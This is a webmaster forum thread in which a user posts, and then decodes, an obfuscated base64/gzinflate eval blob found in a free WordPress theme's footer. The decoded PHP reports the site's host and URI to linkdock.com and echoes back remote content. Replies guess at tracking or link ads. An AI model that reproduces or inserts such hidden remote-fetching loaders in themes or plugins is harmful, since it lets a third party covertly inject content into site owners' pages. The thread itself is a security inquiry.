Results 1 to 3 of 3

Thread: dublious code in a wordpress theme for linkdock.com

  1. #1
    ninja SEO paul's Avatar
    Join Date
    Dec 2006
    Location
    .de
    Posts
    1,500
    Post Thanks / Like

    Default dublious code in a wordpress theme for linkdock.com

    Today I download a wordpress theme for my blog. It's called simplejojo and it looks quite nice. But I looked at the footer code and I was surprised that there was something encoded. Here is the code:
    Code:
    <? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); 
    ?>
    online version
    http://paul.****that.com/coded.txt
    I decoded and it looks like
    Code:
    error_reporting(0);
    $CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]);
    
    if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) {
        echo @file_get_contents($CodeURL);
    } elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) {
        $content = @file($CodeURL);
        echo @join("", $content);
    } elseif (function_exists("curl_init")) {
        $ch = curl_init($CodeURL);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_exec($ch);
        curl_close($ch);
    }
    download : http://paul.****that.com/decoded.txt
    But I am still at a loss to see what it does. I couldn't find anything on the linkdock.com domain.

    I wonder it they use the code for inserting link ads of some sorts. I tried to visit some blogs with the useragent changed to the google bot, but nothing extra was displayed.

  2. #2
    Senior Member louie's Avatar
    Join Date
    Jan 2006
    Location
    Dublin, Ireland
    Posts
    2,423
    Post Thanks / Like

    Default

    could be a tracking thing to see how many users are using this template...
    :. Web Design & Development Web Design Ireland
    :. Search Engines Optimization Search Engines Optimization
    :. Car Parts & Accessories Car Parts
    :. Cars Ireland Cars Ireland
    :. I Have 2 Find It Directory SEF Directory

  3. #3
    respect my AW-THOR-IT-AYY Forbairt's Avatar
    Join Date
    Jun 2007
    Location
    My Office, Dublin
    Posts
    2,424
    Post Thanks / Like

    Default

    Quote Originally Posted by louie View Post
    could be a tracking thing to see how many users are using this template...
    +1 ... basically checking who is using it and if any "links" have been kept in it or something like that (they would have the server that is using the file so they can check manually)

Similar Threads

  1. How to create/design your own Wordpress theme?
    By Cormac in forum Blogs & Blogging
    Replies: 4
    Last Post: 12-10-2007, 09:04 PM
  2. Theme Recommendations
    By blacknight in forum Blogs & Blogging
    Replies: 4
    Last Post: 30-07-2007, 12:56 AM
  3. Wordpress theme suggestions?
    By blacknight in forum Blogs & Blogging
    Replies: 4
    Last Post: 27-09-2006, 11:05 PM
  4. Blog Theme?
    By blacknight in forum Site Reviews / Announcements
    Replies: 2
    Last Post: 29-01-2006, 07:19 PM

Visitors found this page by searching for:

linkdock.com

linkdock

dublious

link dockrelated:linkdock.com/ linkdock.comlinkdock.comcontent.phphttp://linkdock.com/content.php?id=&amp;host=&lt;? eval(gzinflate(base64_decode(vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7job auction code wordpresshttp://linkdock.comCodeURL = http:linkdock.comcontent.phpid=&amp;host=word press vulnrabilities eval(base allow_url_fopen.gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode(content.php id= buywordpress linkdock.comerror_reporting(0);$CodeURLlinkdock.com wordpresserror_reporting(0); $CodeURL = http://linkdock.com/content.php?id=&amp;host=.urlencodehttp://linkdock.com/content.phperror_reporting(0);eval(gzinflate(base64_decodeintval(get_cfg_var(allow_url_fopen))http://linkdock.com/content.php?id=wordpress theme linkdockwordpress gzinflate cloude themehttp:linkdock.comcontent.php

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •